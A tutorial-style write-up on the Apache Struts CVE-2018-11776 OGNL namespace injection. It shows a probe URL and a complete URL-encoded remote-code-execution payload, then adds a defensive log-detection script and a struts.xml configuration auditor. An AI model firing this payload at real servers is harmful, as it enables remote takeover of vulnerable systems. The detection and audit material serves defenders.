CVE-2018-11776 Apache Struts vulnerability explanation
What is Apache Struts?
Apache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model–view–controller (MVC) architecture.
What is the root cause of the vulnerability?
The root cause was a lack of input validation on the URL passed to the Struts framework: when an action has no namespace configured, Struts takes the namespace from the request URL itself and evaluates it as an OGNL expression.
Let's begin.
First, visit http://ip:port/struts2-showcase
As I have said, the root cause of the vulnerability is a lack of input validation. So here I tried to inject a payload in URL-encoded form: I entered {444*333}, URL-encoded as `%7B444*333%7D`, with a $ sign in front of it.
http://ip:port/struts2-showcase/$%7B444*333%7D/actionChain1.action
You will get a response containing the result of the multiplication. This tells you which part of the URL is vulnerable and how to send the request.
http://ip:port/struts2-showcase/147852/actionChain1.action
Now, as the CVE states, Apache Struts is vulnerable to remote code execution. Having found which URL and parameter are vulnerable, we can apply a payload that yields remote code execution.
/struts2-showcase/$%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B'struts.valueStack'%5D.context).(%23cr%3D%23ct%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec('executecommand')).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action
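From the defender's side, the probe above leaves a clear trace: an OGNL marker (`${` or `%{`, usually percent-encoded) in a path segment in front of a `.action` resource. The following detector is an added example for this write-up, not code from Apache Struts or from the original author. It scans constructed access-log lines (not real traffic) in the common "combined" format, decodes the request path, and flags requests whose namespace segment carries such a marker; the `SAMPLE_LOG` lines, the function names and the log format are assumptions made for the example.

```python
"""Detect CVE-2018-11776 style OGNL namespace probes in web-server access logs.

Added example for this write-up, not code from Apache Struts. It scans
constructed (fake) access-log lines for a URL path segment that carries an
OGNL expression marker (${...} or %{...}, possibly percent-encoded) in front
of a Struts .action resource, which is how the namespace injection shown
above reaches the framework.
"""
from __future__ import annotations

import re
from urllib.parse import unquote

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [25/Aug/2018:10:01:02 +0000] "GET /struts2-showcase/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [25/Aug/2018:10:01:09 +0000] "GET /struts2-showcase/actionChain1.action HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Aug/2018:10:02:41 +0000] "GET /struts2-showcase/$%7B444*333%7D/actionChain1.action HTTP/1.1" 302 0 "-" "curl/7.61.0"
10.0.0.9 - - [25/Aug/2018:10:02:55 +0000] "GET /struts2-showcase/%24%7B1%2B1%7D/actionChain1.action HTTP/1.1" 302 0 "-" "curl/7.61.0"
10.0.0.7 - - [25/Aug/2018:10:03:10 +0000] "GET /struts2-showcase/147852/actionChain1.action HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Minimal parser for the "combined" log format: client IP, timestamp,
# request method, request path and HTTP status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# OGNL expressions in Struts are written ${...} or %{...}.
OGNL_MARKER = re.compile(r'[$%]\{')


def is_ognl_namespace_probe(path: str) -> bool:
    """True if a path segment before the .action resource holds an OGNL marker."""
    path = path.split('?', 1)[0]
    # Decode twice so double-encoded requests are not missed.
    decoded = unquote(unquote(path))
    segments = decoded.split('/')
    if not segments or not segments[-1].endswith('.action'):
        return False
    # Only the segments in front of the action name form the namespace.
    return any(OGNL_MARKER.search(seg) for seg in segments[:-1])


def find_probes(log_text: str) -> list[dict]:
    """Return one dict per suspicious request: client IP, raw path and status."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        if is_ognl_namespace_probe(m['path']):
            hits.append({'ip': m['ip'], 'path': m['path'], 'status': m['status']})
    return hits


if __name__ == '__main__':
    for hit in find_probes(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['status']} {hit['path']}")
```

Run against the sample, the two `10.0.0.9` requests are reported and the benign ones, including the `147852` redirect target that the probe produces, are not. Decoding before matching matters because the marker arrives as `%7B`, `%24%7B` or similar, so a raw substring match on `${` would miss it.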
Who is Vulnerable?
- The alwaysSelectFullNamespace flag is set to true in the Struts configuration.
- The Struts configuration file contains an <action …> tag that does not specify the optional namespace attribute, or that specifies a wildcard namespace.
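Both conditions above can be checked mechanically in struts.xml. The auditor below is an added example written for this write-up, not Apache Struts code; it parses a constructed struts.xml (embedded in the block, not from a real deployment) and reports whether `struts.mapper.alwaysSelectFullNamespace` is set to true and which actions sit in a package whose namespace is missing, empty or a wildcard. In struts.xml the namespace is an attribute of the enclosing `<package>`, which is what the "action without a namespace" condition corresponds to; the sample package and action names are assumptions.

```python
"""Audit a struts.xml for the two CVE-2018-11776 preconditions listed above.

Added example for this write-up, not Apache Struts code. It parses a
constructed struts.xml (embedded below) and reports (1) whether the
struts.mapper.alwaysSelectFullNamespace constant is true and (2) which
actions live in a package whose namespace is missing, empty or a wildcard.
"""
import xml.etree.ElementTree as ET

# Constructed sample configuration (not taken from a real deployment).
SAMPLE_STRUTS_XML = """\
<struts>
  <constant name="struts.devMode" value="false"/>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>

  <!-- no namespace attribute: the namespace is taken from the request URL -->
  <package name="actionchaining" extends="struts-default">
    <action name="actionChain1" class="example.ActionChain1Action">
      <result type="chain">actionChain2</result>
    </action>
  </package>

  <!-- wildcard namespace: also matched from the URL -->
  <package name="wild" namespace="/*" extends="struts-default">
    <action name="list" class="example.ListAction"/>
  </package>

  <!-- fixed namespace: not affected by this condition -->
  <package name="safe" namespace="/admin" extends="struts-default">
    <action name="index" class="example.IndexAction"/>
  </package>
</struts>
"""

FLAG = "struts.mapper.alwaysSelectFullNamespace"


def always_select_full_namespace(root):
    """Return True if the flag is set to true in this file (False if absent).

    If the constant appears more than once, the last declaration wins here.
    """
    value = False
    for const in root.iter("constant"):
        if const.get("name") == FLAG:
            value = const.get("value", "").strip().lower() == "true"
    return value


def unsafe_actions(root):
    """List 'package/action' names whose package namespace is missing, empty or wildcard."""
    found = []
    for pkg in root.iter("package"):
        ns = pkg.get("namespace")
        if ns is None or ns.strip() == "" or "*" in ns:
            for action in pkg.findall("action"):
                found.append(f"{pkg.get('name')}/{action.get('name')}")
    return found


def audit(xml_text):
    """Return (flag_is_true, unsafe_action_list); True plus a non-empty list means exposed."""
    root = ET.fromstring(xml_text)
    return always_select_full_namespace(root), unsafe_actions(root)


if __name__ == "__main__":
    flag, actions = audit(SAMPLE_STRUTS_XML)
    print(f"{FLAG} = {flag}")
    for a in actions:
        print("action without a fixed namespace:", a)
    if flag and actions:
        print("exposed: the namespace for the actions above is taken from the URL")
```

On the sample, the flag is true and `actionchaining/actionChain1` and `wild/list` are reported, while `safe/index` is not. One caveat when running this on a real deployment: the Struts Convention plugin sets `struts.mapper.alwaysSelectFullNamespace` to true in its own bundled struts-plugin.xml, so the constant being absent from the application's struts.xml does not prove the flag is off. The fix remains to update to a patched version, as the next section says, and to give every package an explicit, non-wildcard namespace.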
Impacted Versions.
The impacted versions are Struts 2.3 through Struts 2.3.34 and Struts 2.5 through Struts 2.5.16 of the Apache Struts framework. If you are currently running an affected version, updating is highly recommended.
Video Proof of Concept